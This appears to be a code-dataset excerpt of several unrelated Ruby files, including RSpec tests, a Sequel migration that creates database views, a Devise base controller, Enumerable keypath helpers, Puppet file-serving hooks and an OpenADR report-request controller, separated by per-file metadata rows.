# Trigger the behavior that occurs when invalid params are submitted
App.any_instance.stub(:save).and_return(false)
put :update, :id => app.id.to_s, :app => {}
assigns(:app).should eq(app)
end
it "re-renders the 'edit' template" do
app = App.create! valid_attributes
# Trigger the behavior that occurs when invalid params are submitted
App.any_instance.stub(:save).and_return(false)
put :update, :id => app.id.to_s, :app => {}
response.should render_template("edit")
end
end
end
describe "DELETE destroy" do
it "destroys the requested app" do
app = App.create! valid_attributes
expect {
delete :destroy, :id => app.id.to_s
}.to change(App, :count).by(-1)
end
it "redirects to the apps list" do
app = App.create! valid_attributes
delete :destroy, :id => app.id.to_s
response.should redirect_to(apps_url)
end
end
end
| 33.853801 | 169 | 0.658836 |
79abba78c0737f6f445549e68feead65c7582931 | 155 | class BadgeGroupingSerializer < ApplicationSerializer
attributes :id, :name, :description, :position, :system
def system
object.system?
end
end
| 19.375 | 57 | 0.754839 |
4a8683d925805c13359dbc0d3d3114e3940522c7 | 2,828 | Sequel.migration do
up do
# The denormalised pact publication details for each publication
create_view(:all_pact_publications,
Sequel::Model.db[:pact_publications].select(
Sequel[:pact_publications][:id],
Sequel[:c][:id].as(:consumer_id), Sequel[:c][:name].as(:consumer_name),
Sequel[:cv][:id].as(:consumer_version_id), Sequel[:cv][:number].as(:consumer_version_number), Sequel[:cv][:order].as(:consumer_version_order),
Sequel[:p][:id].as(:provider_id), Sequel[:p][:name].as(:provider_name),
Sequel[:pact_publications][:revision_number], Sequel[:pv][:id].as(:pact_version_id), Sequel[:pv][:sha].as(:pact_version_sha), Sequel[:pact_publications][:created_at]).
join(:versions, {:id => :consumer_version_id}, {:table_alias => :cv, implicit_qualifier: :pact_publications}).
join(:pacticipants, {:id => :pacticipant_id}, {:table_alias => :c, implicit_qualifier: :cv}).
join(:pacticipants, {:id => :provider_id}, {:table_alias => :p, implicit_qualifier: :pact_publications}).
join(:pact_versions, {:id => :pact_version_id}, {:table_alias => :pv, implicit_qualifier: :pact_publications})
)
# Latest revision number for each consumer version order
create_view(:latest_pact_publication_revision_numbers,
"select provider_id, consumer_id, consumer_version_order, max(revision_number) as latest_revision_number
from all_pact_publications
group by provider_id, consumer_id, consumer_version_order"
)
# Latest pact_publication (revision) for each provider/consumer version
# updated in 20180519_recreate_views.rb
create_view(:latest_pact_publications_by_consumer_versions,
"select app.*
from all_pact_publications app
inner join latest_pact_publication_revision_numbers lr
on app.consumer_id = lr.consumer_id
and app.provider_id = lr.provider_id
and app.consumer_version_order = lr.consumer_version_order
and app.revision_number = lr.latest_revision_number"
)
# updated in 20180519_recreate_views.rb
# This view tells us the latest consumer version with a pact for a consumer/provider pair
create_or_replace_view(:latest_pact_consumer_version_orders,
"select provider_id, consumer_id, max(consumer_version_order) as latest_consumer_version_order
from all_pact_publications
group by provider_id, consumer_id"
)
# Latest pact publications by consumer/provider
create_view(:latest_pact_publications,
"select lpcv.*
from latest_pact_publications_by_consumer_versions lpcv
inner join latest_pact_consumer_version_orders lp
on lpcv.consumer_id = lp.consumer_id
and lpcv.provider_id = lp.provider_id
and lpcv.consumer_version_order = latest_consumer_version_order"
)
end
end
| 49.614035 | 173 | 0.732673 |
010d9d865082bc0cd6f6e92b541a937c017cd8ec | 285 | require 'rails_helper'
describe 'JustDatetimePickerInput', type: :feature do
context 'Form' do
before do
add_user_resource
end
it 'shows input' do
visit new_admin_user_path
expect(page).to have_css('.just_datetime_picker', count: 1)
end
end
end
| 19 | 65 | 0.691228 |
876025a5dbac62ef834e782a5bbf256697dfe977 | 88 | $LOAD_PATH << "#{File.dirname(__FILE__)}/../lib"
require 'compiler'
Compiler.make_all
| 14.666667 | 48 | 0.704545 |
26def9261d5d920d0b917842c9e747b7136f8001 | 589 | module Recurr
module Events
class Base
attr_reader :options, :starts
attr_accessor :start_year,
:start_month,
:start_day
DAY_REPRESENTATION = 24 * 3600
def initialize(options)
@options = options
@starts = options[:starts]&.to_time || Time.current
@start_year = starts.year
@start_month = starts.month
@start_day = starts.day
end
def current
raise NotImplementedError
end
def next
raise NotImplementedError
end
end
end
end
| 19.633333 | 59 | 0.573854 |
d54a3282b7d6070c1e58efefbd69682b17a2a9c0 | 2,491 | Addressbookserver::Application.configure do
# Settings specified here will take precedence over those in config/application.rb
# Code is not reloaded between requests
config.cache_classes = true
# Full error reports are disabled and caching is turned on
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Disable Rails's static asset server (Apache or nginx will already do this)
config.serve_static_assets = false
# Compress JavaScripts and CSS
config.assets.compress = true
# Don't fallback to assets pipeline if a precompiled asset is missed
config.assets.compile = false
# Generate digests for assets URLs
config.assets.digest = true
# Defaults to nil and saved in location specified by config.assets.prefix
# config.assets.manifest = YOUR_PATH
# Specifies the header that your server uses for sending files
# config.action_dispatch.x_sendfile_header = "X-Sendfile" # for apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for nginx
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# See everything in the log (default is :info)
# config.log_level = :debug
# Prepend all log lines with the following tags
# config.log_tags = [ :subdomain, :uuid ]
# Use a different logger for distributed setups
# config.logger = ActiveSupport::TaggedLogging.new(SyslogLogger.new)
# Use a different cache store in production
# config.cache_store = :mem_cache_store
# Enable serving of images, stylesheets, and JavaScripts from an asset server
# config.action_controller.asset_host = "http://assets.example.com"
# Precompile additional assets (application.js, application.css, and all non-JS/CSS are already added)
# config.assets.precompile += %w( search.js )
# Disable delivery errors, bad email addresses will be ignored
# config.action_mailer.raise_delivery_errors = false
# Enable threaded mode
# config.threadsafe!
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation can not be found)
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners
config.active_support.deprecation = :notify
# Log the query plan for queries taking more than this (works
# with SQLite, MySQL, and PostgreSQL)
# config.active_record.auto_explain_threshold_in_seconds = 0.5
end
| 36.632353 | 104 | 0.760739 |
38987a2025c4e81161ae70e6712dadff4a9a7cef | 700 | #
# This code handles the creation of the github client with or without an auth token
#
# This class smells of :reek:UtilityFunction
class GithubListerCore
class << self
#
# Everything from here is private
#
private
#
# Initialise the client and set auto_paginate to true
#
def init_client(options = {})
token = get_option(options, :token)
client = if token
Octokit::Client.new(:access_token => token)
else
Octokit::Client.new
end
client.auto_paginate = true
client
end
end
end
| 25 | 83 | 0.522857 |
79dd5bb69f11006d650eb9ba120b2dbca6dc658f | 488 | module SS::Model::MailSetting
extend ActiveSupport::Concern
extend SS::Translation
included do
field :sender_name, type: String
field :sender_email, type: String
field :mail_signature, type: String
permit_params :sender_name, :sender_email, :mail_signature
validates :sender_email, email: true
end
def sender_address
email = sender_email.presence || SS.config.mail.default_from
sender_name.present? ? "#{sender_name} <#{email}>" : email
end
end | 25.684211 | 64 | 0.727459 |
bbc71a03f51264e34572a6239a9e8188ab40bd1d | 16,998 | #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#
# Copyright (c) 2016, Electric Power Research Institute (EPRI)
# All rights reserved.
#
# OpenADR ("this software") is licensed under BSD 3-Clause license.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of EPRI nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
#
# This EPRI software incorporates work covered by the following copyright and permission
# notices. You may not use these works except in compliance with their respective
# licenses, which are provided below.
#
# These works are provided by the copyright holders and contributors "as is" and any express or
# implied warranties, including, but not limited to, the implied warranties of merchantability
# and fitness for a particular purpose are disclaimed.
#
#########################################################################################
# MIT Licensed Libraries
#########################################################################################
#
# * actionmailer 3.2.12 (http://www.rubyonrails.org) - Email composition, delivery, and receiving framework (part of Rails).
# * actionpack 3.2.12 (http://www.rubyonrails.org) - Web-flow and rendering framework putting the VC in MVC (part of Rails).
# * activemodel 3.2.12 (http://www.rubyonrails.org) - A toolkit for building modeling frameworks (part of Rails).
# * activerecord 3.2.12 (http://www.rubyonrails.org) - Object-relational mapper framework (part of Rails).
# * activeresource 3.2.12 (http://www.rubyonrails.org) - REST modeling framework (part of Rails).
# * activesupport 3.2.12 (http://www.rubyonrails.org) - A toolkit of support libraries and Ruby core extensions extracted from the Rails framework.
# * arel 3.0.2 (http://github.com/rails/arel) - Arel is a SQL AST manager for Ruby
# * bootstrap-sass 3.1.1.0 (https://github.com/twbs/bootstrap-sass) - Twitter's Bootstrap, converted to Sass and ready to drop into Rails or Compass
# * builder 3.0.4 (http://onestepback.org) - Builders for MarkUp.
# * bundler 1.12.5 (http://bundler.io) - The best way to manage your application's dependencies
# * capybara 2.4.4 (http://github.com/jnicklas/capybara) - Capybara aims to simplify the process of integration testing Rack applications, such as Rails, Sinatra or Merb
# * coffee-rails 3.2.2 () - Coffee Script adapter for the Rails asset pipeline.
# * coffee-script-source 1.6.3 (http://jashkenas.github.com/coffee-script/) - The CoffeeScript Compiler
# * docile 1.1.5 (https://ms-ati.github.io/docile/) - Docile keeps your Ruby DSLs tame and well-behaved
# * edn 1.0.0 () - 'edn implements a reader for Extensible Data Notation by Rich Hickey.'
# * erubis 2.7.0 (http://www.kuwata-lab.com/erubis/) - a fast and extensible eRuby implementation which supports multi-language
# * execjs 1.4.0 (https://github.com/sstephenson/execjs) - Run JavaScript code from Ruby
# * factory_girl 4.5.0 (https://github.com/thoughtbot/factory_girl) - factory_girl provides a framework and DSL for defining and using model instance factories.
# * factory_girl_rails 4.5.0 (http://github.com/thoughtbot/factory_girl_rails) - factory_girl_rails provides integration between factory_girl and rails 3
# * gem-licenses 0.1.2 (http://github.com/dblock/gem-licenses) - List all gem licenses.
# * hike 1.2.3 (http://github.com/sstephenson/hike) - Find files in a set of paths
# * i18n 0.6.5 (http://github.com/svenfuchs/i18n) - New wave Internationalization support for Ruby
# * jdbc-postgresql 9.2.1000 (https://github.com/rosenfeld/jdbc-postgresql) - PostgresSQL jdbc driver for JRuby
# * journey 1.0.4 (http://github.com/rails/journey) - Journey is a router
# * jquery-rails 3.0.4 (http://rubygems.org/gems/jquery-rails) - Use jQuery with Rails 3
# * json-schema 2.6.2 (http://github.com/ruby-json-schema/json-schema/tree/master) - Ruby JSON Schema Validator
# * mail 2.4.4 (http://github.com/mikel/mail) - Mail provides a nice Ruby DSL for making, sending and reading emails.
# * metaclass 0.0.4 (http://github.com/floehopper/metaclass) - Adds a metaclass method to all Ruby objects
# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
# * mocha 1.1.0 (http://gofreerange.com/mocha/docs) - Mocking and stubbing library
# * multi_json 1.7.9 (http://github.com/intridea/multi_json) - A common interface to multiple JSON libraries.
# * nokogiri 1.6.5 (http://nokogiri.org) - Nokogiri (鋸) is an HTML, XML, SAX, and Reader parser
# * polyglot 0.3.3 (http://github.com/cjheath/polyglot) - Augment 'require' to load non-Ruby file types
# * rack-test 0.6.2 (http://github.com/brynary/rack-test) - Simple testing API built on Rack
# * railties 3.2.12 (http://www.rubyonrails.org) - Tools for creating, working with, and running Rails applications.
# * rake 10.1.0 (http://rake.rubyforge.org) - Ruby based make-like utility.
# * rspec-core 2.14.3 (http://github.com/rspec/rspec-core) - rspec-core-2.14.3
# * rspec-expectations 2.14.0 (http://github.com/rspec/rspec-expectations) - rspec-expectations-2.14.0
# * rspec-mocks 2.14.1 (http://github.com/rspec/rspec-mocks) - rspec-mocks-2.14.1
# * rspec-rails 2.14.0 (http://github.com/rspec/rspec-rails) - rspec-rails-2.14.0
# * sass 3.2.9 (http://sass-lang.com/) - A powerful but elegant CSS compiler that makes CSS fun again.
# * sass-rails 3.2.6 () - Sass adapter for the Rails asset pipeline.
# * simplecov 0.9.0 (http://github.com/colszowka/simplecov) - Code coverage for Ruby 1.9+ with a powerful configuration library and automatic merging of coverage across test suites
# * spork 1.0.0rc3 (http://github.com/sporkrb/spork) - spork
# * therubyrhino 2.0.2 (http://github.com/cowboyd/therubyrhino) - Embed the Rhino JavaScript interpreter into JRuby
# * thor 0.18.1 (http://whatisthor.com/) - A scripting framework that replaces rake, sake and rubigen
# * tilt 1.4.1 (http://github.com/rtomayko/tilt/) - Generic interface to multiple Ruby template engines
# * treetop 1.4.14 (https://github.com/cjheath/treetop) - A Ruby-based text parsing and interpretation DSL
# * uglifier 2.1.2 (http://github.com/lautis/uglifier) - Ruby wrapper for UglifyJS JavaScript compressor
# * xpath 2.0.0 (http://github.com/jnicklas/xpath) - Generate XPath expressions from Ruby
# * blankslate 2.1.2.4 (http://github.com/masover/blankslate) - BlankSlate extracted from Builder.
# * bourbon 3.1.8 (https://github.com/thoughtbot/bourbon) - Bourbon Sass Mixins using SCSS syntax.
# * coffee-script 2.2.0 (http://github.com/josh/ruby-coffee-script) - Ruby CoffeeScript Compiler
# * diff-lcs 1.2.4 (http://diff-lcs.rubyforge.org/) - Diff::LCS computes the difference between two Enumerable sequences using the McIlroy-Hunt longest common subsequence (LCS) algorithm
# * jquery-ui-rails 4.0.3 (https://github.com/joliss/jquery-ui-rails) - jQuery UI packaged for the Rails asset pipeline
# * parslet 1.4.0 (http://kschiess.github.com/parslet) - Parser construction library with great error reporting in Ruby.
# * rack 1.4.5 (http://rack.github.com/) - a modular Ruby webserver interface
# * rack-cache 1.2 (http://tomayko.com/src/rack-cache/) - HTTP Caching for Rack
# * rack-ssl 1.3.3 (https://github.com/josh/rack-ssl) - Force SSL/TLS in your app.
# * rails 3.2.12 (http://www.rubyonrails.org) - Full-stack web application framework.
# * simplecov-html 0.8.0 (https://github.com/colszowka/simplecov-html) - Default HTML formatter for SimpleCov code coverage tool for ruby 1.9+
# * tzinfo 0.3.37 (http://tzinfo.rubyforge.org/) - Daylight-savings aware timezone library
# * warbler 1.4.0.beta1 (http://caldersphere.rubyforge.org/warbler) - Warbler chirpily constructs .war files of your Rails applications.
#
#########################################################################################
# BSD Licensed Libraries
#########################################################################################
#
# * activerecord-jdbc-adapter 1.2.9.1 (https://github.com/jruby/activerecord-jdbc-adapter) - Copyright (c) 2006-2012 Nick Sieger <[email protected]>, Copyright (c) 2006-2008 Ola Bini <[email protected]>
# * jdbc-postgres 9.2.1004 (https://github.com/jruby/activerecord-jdbc-adapter) - Copyright (c) 1997-2011, PostgreSQL Global Development Group
# * d3js 3.5.16 (https://d3js.org/) Copyright (c) 2015 Mike Bostock
#
#########################################################################################
# Ruby Licensed Libraries
#########################################################################################
#
# * json 1.8.0 (http://json-jruby.rubyforge.org/) - JSON implementation for JRuby
# * rubyzip 0.9.9 (http://github.com/aussiegeek/rubyzip) - rubyzip is a ruby module for reading and writing zip files
# * httpclient 2.3.4.1 (http://github.com/nahi/httpclient) - gives something like the functionality of libwww-perl (LWP) in Ruby
# * test-unit 2.5.5 (http://test-unit.rubyforge.org/) - test-unit - Improved version of Test::Unit bundled in Ruby 1.8.x.
#
#########################################################################################
# Public domain - creative commons Licensed Libraries
#########################################################################################
#
# * torquebox 3.1.2 (http://torquebox.org/) - TorqueBox Gem
# * torquebox-cache 3.1.2 (http://torquebox.org/) - TorqueBox Cache Gem
# * torquebox-configure 3.1.2 (http://torquebox.org/) - TorqueBox Configure Gem
# * torquebox-core 3.1.2 (http://torquebox.org/) - TorqueBox Core Gem
# * torquebox-messaging 3.1.2 (http://torquebox.org/) - TorqueBox Messaging Client
# * torquebox-naming 3.1.2 (http://torquebox.org/) - TorqueBox Naming Client
# * torquebox-rake-support 3.1.2 (http://torquebox.org/) - TorqueBox Rake Support
# * torquebox-security 3.1.2 (http://torquebox.org/) - TorqueBox Security Gem
# * torquebox-server 3.1.2 (http://torquebox.org/) - TorqueBox Server Gem
# * torquebox-stomp 3.1.2 (http://torquebox.org/) - TorqueBox STOMP Support
# * torquebox-transactions 3.1.2 (http://torquebox.org/) - TorqueBox Transactions Gem
# * torquebox-web 3.1.2 (http://torquebox.org/) - TorqueBox Web Gem
#
#########################################################################################
# Apache Licensed Libraries
#########################################################################################
#
# * addressable 2.3.8 (https://github.com/sporkmonger/addressable) - URI Implementation
# * bcrypt-ruby 3.0.1 (http://bcrypt-ruby.rubyforge.org) - OpenBSD's bcrypt() password hashing algorithm.
# * database_cleaner 1.4.0 (http://github.com/bmabey/database_cleaner) - Strategies for cleaning databases. Can be used to ensure a clean state for testing.
# * annotate 2.5.0 (http://github.com/ctran/annotate_models) - Annotates Rails Models, routes, fixtures, and others based on the database schema.
# * nvd3 1.8.4 (http://nvd3.org/) Copeyright (c) 2014 Novus Partners - chart library based on d3js
# * smack 3.3.1 (https://www.igniterealtime.org/projects/smack/) - XMPP library
#
#########################################################################################
# LGPL
#########################################################################################
#
# * jruby-1.7.4
# * jruby-jars 1.7.4 (http://github.com/jruby/jruby/tree/master/gem/jruby-jars) - The core JRuby code and the JRuby stdlib as jar
# ** JRuby is tri-licensed GPL, LGPL, and EPL.
#
#########################################################################################
# MPL Licensed Libraries
#########################################################################################
#
# * therubyrhino_jar 1.7.4 (http://github.com/cowboyd/therubyrhino) - Rhino's jars packed for therubyrhino
#
#########################################################################################
# Artistic 2.0
# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
#
#########################################################################################
#
#########################################################################################
# GPL-2
#########################################################################################
# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
#
#########################################################################################
# No License Given
#########################################################################################
#
# * spork-testunit 0.0.8 (http://github.com/timcharper/spork-testunit) - spork-testunit
# * sprockets 2.2.2 (http://getsprockets.org/) - Rack-based asset packaging system
#
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
class CreateReportsController < BaseController
before_filter :logged_in_account
before_filter :correct_account, except: [:new, :create]
before_filter { |c| c.set_parent_menu_item_class NavigationHelper::VENS_MENU_ITEM_CLASS }
# before_filter :admin_account, except: [:show]
########################################################
def send_to_ven
@create_report.queue_create_report
redirect_to create_report_path(@create_report), notice: 'Report Request queued for VEN.'
end
########################################################
def cancel_create_report
report_to_follow = params[:create_report][:report_to_follow]
@create_report.queue_cancel_report(report_to_follow == "1" ? true : false)
redirect_to create_report_path(@create_report), notice: 'Report Cancellation queued for VEN.'
end
########################################################
def show
end
########################################################
def new
@account = current_account
@ven = @account.vens.find(params[:ven_id])
@create_report = @ven.create_reports.new
end
########################################################
def create
@report_request = ReportRequest.new
@account = current_account
@ven = @account.vens.find(params[:ven_id])
@create_report = @ven.create_reports.build(params[:create_report])
@create_report.request_id = SecureRandom.hex(10)
respond_to do |format|
if @create_report.save
format.html { redirect_to create_report_path(@create_report), notice: 'Report Request was successfully created.' }
else
format.html { render action: "new" }
end
end
end
########################################################
def update
@report_request = nil
respond_to do |format|
if @create_report.update_attributes(params[:create_report])
# format.html { redirect_to edit_ven_url(@ven), notice: 'VEN was successfully updated.' }
flash.now[:notice] = 'Report Request was successfully updated.'
format.html { render :show }
format.json { head :no_content }
else
format.html { render action: "show" }
end
end
end
########################################################
def destroy
@create_report.destroy
respond_to do |format|
flash[:notice] = "Report Request deleted"
format.html { redirect_to :back }
format.json { head :no_content }
end
end
########################################################
private
def correct_account
@create_report = CreateReport.find(params[:id])
@account = @create_report.ven.account
correct_account_or_admin @account
end
end
| 57.425676 | 206 | 0.62678 |
e28554f08c0a2b6b57fab7fb86ebd1ff8304543f | 434 | # These are Class level methods.
module Effective
module EffectiveDatatable
module Dsl
def datatable(&block)
define_method('initialize_datatable') { instance_exec(&block) }
end
def scopes(&block)
define_method('initialize_scopes') { instance_exec(&block) }
end
def charts(&block)
define_method('initialize_charts') { instance_exec(&block) }
end
end
end
end
| 19.727273 | 71 | 0.652074 |
bb3feafa692471af6e42091e97a3c5efc8ecaad4 | 6,030 | # All Devise controllers are inherited from here.
class DeviseController < Devise.parent_controller.constantize
include Devise::Controllers::ScopedViews
helper DeviseHelper
helpers = %w(resource scope_name resource_name signed_in_resource
resource_class resource_params devise_mapping)
helper_method(*helpers)
prepend_before_filter :assert_is_devise_resource!
respond_to :html if mimes_for_respond_to.empty?
# Override prefixes to consider the scoped view.
# Notice we need to check for the request due to a bug in
# Action Controller tests that forces _prefixes to be
# loaded before even having a request object.
#
# This method should be public as it is is in ActionPack
# itself. Changing its visibility may break other gems.
def _prefixes #:nodoc:
@_prefixes ||= if self.class.scoped_views? && request && devise_mapping
["#{devise_mapping.scoped_path}/#{controller_name}"] + super
else
super
end
end
protected
# Gets the actual resource stored in the instance variable
def resource
instance_variable_get(:"@#{resource_name}")
end
# Proxy to devise map name
def resource_name
devise_mapping.name
end
alias :scope_name :resource_name
# Proxy to devise map class
def resource_class
devise_mapping.to
end
# Returns a signed in resource from session (if one exists)
def signed_in_resource
warden.authenticate(scope: resource_name)
end
# Attempt to find the mapped route for devise based on request path
def devise_mapping
@devise_mapping ||= request.env["devise.mapping"]
end
# Checks whether it's a devise mapped resource or not.
def assert_is_devise_resource! #:nodoc:
unknown_action! <<-MESSAGE unless devise_mapping
Could not find devise mapping for path #{request.fullpath.inspect}.
This may happen for two reasons:
1) You forgot to wrap your route inside the scope block. For example:
devise_scope :user do
get "/some/route" => "some_devise_controller"
end
2) You are testing a Devise controller bypassing the router.
If so, you can explicitly tell Devise which mapping to use:
@request.env["devise.mapping"] = Devise.mappings[:user]
MESSAGE
end
# Returns real navigational formats which are supported by Rails
def navigational_formats
@navigational_formats ||= Devise.navigational_formats.select { |format| Mime::EXTENSION_LOOKUP[format.to_s] }
end
def unknown_action!(msg)
logger.debug "[Devise] #{msg}" if logger
raise AbstractController::ActionNotFound, msg
end
# Sets the resource creating an instance variable
def resource=(new_resource)
instance_variable_set(:"@#{resource_name}", new_resource)
end
# Helper for use in before_filters where no authentication is required.
#
# Example:
# before_filter :require_no_authentication, only: :new
def require_no_authentication
assert_is_devise_resource!
return unless is_navigational_format?
no_input = devise_mapping.no_input_strategies
authenticated = if no_input.present?
args = no_input.dup.push scope: resource_name
warden.authenticate?(*args)
else
warden.authenticated?(resource_name)
end
if authenticated && resource = warden.user(resource_name)
flash[:alert] = I18n.t("devise.failure.already_authenticated")
redirect_to after_sign_in_path_for(resource)
end
end
# Helper for use after calling send_*_instructions methods on a resource.
# If we are in paranoid mode, we always act as if the resource was valid
# and instructions were sent.
def successfully_sent?(resource)
notice = if Devise.paranoid
resource.errors.clear
:send_paranoid_instructions
elsif resource.errors.empty?
:send_instructions
end
if notice
set_flash_message :notice, notice if is_flashing_format?
true
end
end
# Sets the flash message with :key, using I18n. By default you are able
# to setup your messages using specific resource scope, and if no message is
# found we look to the default scope. Set the "now" options key to a true
# value to populate the flash.now hash in lieu of the default flash hash (so
# the flash message will be available to the current action instead of the
# next action).
# Example (i18n locale file):
#
# en:
# devise:
# passwords:
# #default_scope_messages - only if resource_scope is not found
# user:
# #resource_scope_messages
#
# Please refer to README or en.yml locale file to check what messages are
# available.
def set_flash_message(key, kind, options = {})
message = find_message(kind, options)
if options[:now]
flash.now[key] = message if message.present?
else
flash[key] = message if message.present?
end
end
# Sets minimum password length to show to user
def set_minimum_password_length
if devise_mapping.validatable?
@minimum_password_length = resource_class.password_length.min
end
end
def devise_i18n_options(options)
options
end
# Get message for given
def find_message(kind, options = {})
options[:scope] ||= translation_scope
options[:default] = Array(options[:default]).unshift(kind.to_sym)
options[:resource_name] = resource_name
options = devise_i18n_options(options)
I18n.t("#{options[:resource_name]}.#{kind}", options)
end
# Controllers inheriting DeviseController are advised to override this
# method so that other controllers inheriting from them would use
# existing translations.
def translation_scope
"devise.#{controller_name}"
end
def clean_up_passwords(object)
object.clean_up_passwords if object.respond_to?(:clean_up_passwords)
end
def respond_with_navigational(*args, &block)
respond_with(*args) do |format|
format.any(*navigational_formats, &block)
end
end
def resource_params
params.fetch(resource_name, {})
end
ActiveSupport.run_load_hooks(:devise_controller, self)
end
| 30.15 | 113 | 0.729187 |
62709633d2e891e5b625cd24b6841d5e671f9005 | 2,605 | module Enumerable
# see: http://stackoverflow.com/a/7139631/83386
def value_at_keypath(keypath)
keypath = keypath.to_s if keypath.is_a?(KeyPath::Path)
parts = keypath.split '.', 2
# if it's an array, call the index
if self[parts[0].to_i]
match = self[parts[0].to_i]
else
match = self[parts[0]] || self[parts[0].to_sym]
end
if !parts[1] || match.nil?
return match
else
return match.value_at_keypath(parts[1])
end
end
def set_keypath(keypath, value)
# handle both string and KeyPath::Path forms
keypath = keypath.to_keypath if keypath.is_a?(String)
keypath_parts = keypath.to_a
# Return self if path empty
return self if keypath_parts.empty?
key = keypath_parts.shift
# Just assign value to self when it's a direct path
# Remember, this is after calling keypath_parts#shift
if keypath_parts.length == 0
key = key.is_number? ? Integer(key) : key.to_sym
self[key] = value
return self
end
# keypath_parts.length > 0
# Remember, this is after calling keypath_parts#shift
collection = if key.is_number?
Array.new
else
Hash.new
end
# Remember, this is after calling keypath_parts#shift
collection.set_keypath(keypath_parts.join('.'), value)
# merge the new collection into self
self[key] = collection
end
def delete_at_keypath_with_wildcard(keypath)
return delete_at_keypath(keypath, true)
end
def delete_at_keypath(keypath, wild_card_allowed = false)
keypath = keypath.to_s if keypath.is_a?(KeyPath::Path)
parts = keypath.split '.', 2
return nil if parts.empty?
index = Integer parts[0] rescue nil
unless parts[1]
if index
return self.delete_at index
else
return (self.delete parts[0]) || (self.delete parts[0].to_sym)
end
return
end
# if it's an array, call the index
if self.is_a? Array
match = index ? self[index] : nil
elsif wild_card_allowed && parts[0] == '*'
raise "wildcard should only be applied to hash keys; (for array, please skip the key)" unless self.instance_of?(Hash)
match = self.values
else
match = self[parts[0]] || self[parts[0].to_sym]
end
return nil unless match.instance_of?(Hash) || match.instance_of?(Array)
if match.instance_of?(Array) and (false if Integer((parts[1].split '.',2).first) rescue true)
return match.collect {|m| m.delete_at_keypath(parts[1], wild_card_allowed)}
end
return match.delete_at_keypath(parts[1], wild_card_allowed)
end
end
| 27.712766 | 123 | 0.663724 |
4af4b66dd87ada6c4485c8b0c02739f2d644accf | 1,432 | class VersionDiffer
def print_latest(io = $stdout)
io.puts diff(last_version, ".")
end
def update(path)
old = File.read(path)
File.open(path, "w") do |file|
show_latest(file)
file << old
end
end
def generate(path)
versions = released_versions
versions.unshift "."
versions.each_cons(2) do |new_version, old_version|
File.open(path, "a") do |file|
file << diff(old_version, new_version)
end
end
end
private
def last_version
released_versions.first
end
def released_versions
require 'open-uri'
require 'multi_json'
versions = MultiJson.decode(open("https://rubygems.org/api/v1/versions/watir-webdriver.json").read)
versions.map! { |e| e.fetch('number')}
end
def diff(old_version, new_version)
puts "diffing #{old_version} -> #{new_version}"
left = "watir-webdriver-#{old_version}.gem"
right = new_version == "." ? new_version : "watir-webdriver-#{new_version}.gem"
str = StringIO.new
str.puts "#{new_version}"
str.puts "=" * new_version.length
str.puts
# requires YARD > 0.8.2.1 (i.e. next release at the time of writing)
content = `yard diff --all --query '!@private && @api.text != "private" && object.visibility == :public' #{left} #{right} 2>&1`
str.puts content.split("\n").map { |line| line.empty? ? line : " #{line}" }
str.puts "\n\n"
str.string
end
end | 24.271186 | 131 | 0.630587 |
4aafcb9fd3caafddeb5004628d9ed655a99808e3 | 1,261 | require 'uri'
require 'puppet/file_serving'
require 'puppet/util'
# This module is used to pick the appropriate terminus
# in file-serving indirections. This is necessary because
# the terminus varies based on the URI asked for.
module Puppet::FileServing::IndirectionHooks
PROTOCOL_MAP = {"puppet" => :rest, "file" => :file}
# Pick an appropriate terminus based on the protocol.
def select_terminus(request)
# We rely on the request's parsing of the URI.
# Short-circuit to :file if it's a fully-qualified path or specifies a 'file' protocol.
return PROTOCOL_MAP["file"] if Puppet::Util.absolute_path?(request.key)
return PROTOCOL_MAP["file"] if request.protocol == "file"
# We're heading over the wire the protocol is 'puppet' and we've got a server name or we're not named 'apply' or 'puppet'
if request.protocol == "puppet" and (request.server or !["puppet","apply"].include?(Puppet.settings[:name]))
return PROTOCOL_MAP["puppet"]
end
if request.protocol and PROTOCOL_MAP[request.protocol].nil?
raise(ArgumentError, "URI protocol '#{request.protocol}' is not currently supported for file serving")
end
# If we're still here, we're using the file_server or modules.
:file_server
end
end
| 39.40625 | 125 | 0.720856 |
7a1ffde093756057f0f811c5128f1a678cee457a | 41 | Thepivotstudy::Engine.routes.draw do
end
| 13.666667 | 36 | 0.829268 |
